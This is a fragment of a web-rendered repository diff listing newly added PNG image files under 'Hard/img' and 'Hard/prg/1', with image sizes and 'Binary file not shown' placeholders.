Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 33 KiB

BIN
Hard/img/8.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 44 KiB

BIN
Hard/img/8_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 35 KiB

BIN
Hard/img/9.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 57 KiB

BIN
Hard/img/9_graph.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 40 KiB

BIN
Hard/prg/1/001.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 22 KiB

BIN
Hard/prg/1/002.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 22 KiB

BIN
Hard/prg/1/003.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 28 KiB

BIN
Hard/prg/1/004.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 15 KiB

BIN
Hard/prg/1/005.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 19 KiB

BIN
Hard/prg/1/006.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 46 KiB

BIN
Hard/prg/1/007.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 7.6 KiB

BIN
Hard/prg/1/008.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 20 KiB

BIN
Hard/prg/1/009.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 11 KiB

BIN
Hard/prg/1/010.png Normal file
View file

Binary file not shown.
Side by side

After

Width:  |  Height:  |  Size: 12 KiB

Some files were not shown because too many files have changed in this diff Show more